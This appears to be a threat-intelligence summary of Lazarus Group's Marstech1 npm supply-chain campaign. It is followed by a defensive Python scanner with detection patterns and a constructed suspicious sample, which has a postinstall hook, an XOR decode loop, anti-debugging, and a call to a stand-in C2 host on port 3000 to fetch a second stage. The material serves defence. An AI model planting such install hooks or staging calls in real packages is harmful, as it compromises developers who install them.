Lazarus Group Targets Developers Through NPM Packages and Supply Chain Attacks
2025-02-13 • SecurityScorecard
SecurityScorecard’s STRIKE team attributes Operation Marstech Mayhem to Lazarus Group and describes Marstech1 as an implant aimed at software developers and cryptocurrency wallets through manipulated open-source repositories. Attackers used fake GitHub repositories and NPM packages with legitimate-looking projects that execute obfuscated JavaScript payloads when cloned and run, with promotion on developer platforms such as LinkedIn and Discord. Marstech1 reportedly downloads additional payloads based on system configuration, persists in developer environments, and exfiltrates cryptocurrency wallet data and authentication credentials from wallets including Exodus, Atomic, and MetaMask across Windows, macOS, and Linux. The campaign uses Base85 encoding, XOR decryption, control-flow flattening, self-invoking functions, anti-debugging features, and C2 servers on port 3000 running Node.js Express backends, with STRIKE reporting 233 confirmed victims across the U.S., Europe, and Asia.
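The indicators the summary lists (lifecycle-hook execution on install, a long Base85 blob, an XOR decode loop, self-invoking functions, control-flow flattening, anti-debugging, and a staging server on port 3000) are all things a reviewer can check for before running a cloned repository or installing a package. The scanner below is an added example written for this page, not SecurityScorecard's or STRIKE's tooling. It assumes Ascii85 `<~ ... ~>` framing for the Base85 check, assigns weights of its own choosing to each indicator, and runs over two constructed sample packages (one benign, one mimicking the described implant) rather than anything taken from the campaign.

```python
"""Heuristic pre-install scanner for the obfuscation and staging indicators
described in the Marstech1 summary.  Added example; indicator weights,
the Ascii85-framing assumption and both sample packages are constructed."""
import json
import re
from dataclasses import dataclass

# npm runs these scripts automatically during install (real npm hook names).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (finding name, regex, weight).  Weights are an illustrative assumption.
JS_PATTERNS = [
    ("long_encoded_blob", re.compile(r"(['\"])[^'\"\n]{200,}\1"), 2),
    ("ascii85_framed_blob", re.compile(r"<~[!-u\s]{40,}~>"), 2),
    ("xor_decode_loop", re.compile(r"charCodeAt\([^)]*\)\s*\^"), 3),
    # IIFE not preceded by an identifier, so ordinary callbacks are not counted.
    ("self_invoking_function",
     re.compile(r"(?<![\w$.])\(\s*(?:function\s*\([^)]*\)|\(\s*\)\s*=>)\s*\{"), 1),
    ("control_flow_flattening",
     re.compile(r"while\s*\(\s*(?:true|1|!!\s*\[\])\s*\)\s*\{\s*switch\s*\("), 3),
    ("anti_debugging", re.compile(r"\bdebugger\b"), 2),
    ("c2_on_port_3000", re.compile(r"https?://[\w.\-]+:3000\b"), 3),
]


@dataclass
class Finding:
    name: str
    weight: int
    location: str
    evidence: str


def scan_package(package_json: str, files: dict) -> dict:
    """Score a package from its manifest text and a {path: source} map."""
    findings = []
    manifest = json.loads(package_json)
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:  # code that runs without the user asking
            findings.append(Finding("lifecycle_hook", 2, "package.json", f"{hook}: {cmd}"))
    for path, src in files.items():
        for name, pat, weight in JS_PATTERNS:
            m = pat.search(src)
            if m:
                findings.append(Finding(name, weight, path, m.group(0)[:60]))
    score = sum(f.weight for f in findings)
    verdict = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"score": score, "verdict": verdict, "findings": findings}


# --- constructed samples (not real packages or real indicators) ---
BENIGN_MANIFEST = '{"name": "pad-helper", "version": "1.0.0", "scripts": {"test": "node test.js"}}'
BENIGN_FILES = {"index.js": "module.exports = function pad(s, n) {\n  return String(s).padStart(n);\n};\n"}

SUSPICIOUS_MANIFEST = '{"name": "wallet-sdk-helper", "version": "2.1.0", "scripts": {"postinstall": "node ./lib/init.js"}}'
_BLOB = "9jqo^BlbD-BleB1DJ+*+F(f,q" * 10  # 250 filler chars shaped like Ascii85; decodes to nothing useful
SUSPICIOUS_FILES = {"lib/init.js": (
    "(function () {\n"
    "  var b = '<~" + _BLOB + "~>';\n"
    "  var out = '';\n"
    "  for (var i = 0; i < b.length; i++) { out += String.fromCharCode(b.charCodeAt(i) ^ 0x5a); }\n"
    "  var k = 0, steps = '2|0|1'.split('|');\n"
    "  while (true) { switch (steps[k++]) { case '0': break; case '1': break; case '2': break; default: return; } }\n"
    "  setInterval(function () { debugger; }, 500);\n"
    "  require('http').get('http://c2.example.invalid:3000/stage2', function () {});\n"
    "})();\n")}


if __name__ == "__main__":
    for label, manifest, files in (("benign", BENIGN_MANIFEST, BENIGN_FILES),
                                   ("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_FILES)):
        r = scan_package(manifest, files)
        print(f"{label}: score={r['score']} verdict={r['verdict']}")
        for f in r["findings"]:
            print(f"  [{f.weight}] {f.name} @ {f.location}: {f.evidence!r}")
```

Run it against an unpacked tarball (`npm pack` the candidate, then feed `package.json` and the `.js` files into `scan_package`) before installing anything promoted through a chat or social link. Any single pattern can appear in legitimate code; the point is that a fresh repository combining an install-time hook with a large encoded blob, an XOR loop and a fixed-port staging URL warrants reading the source before running it.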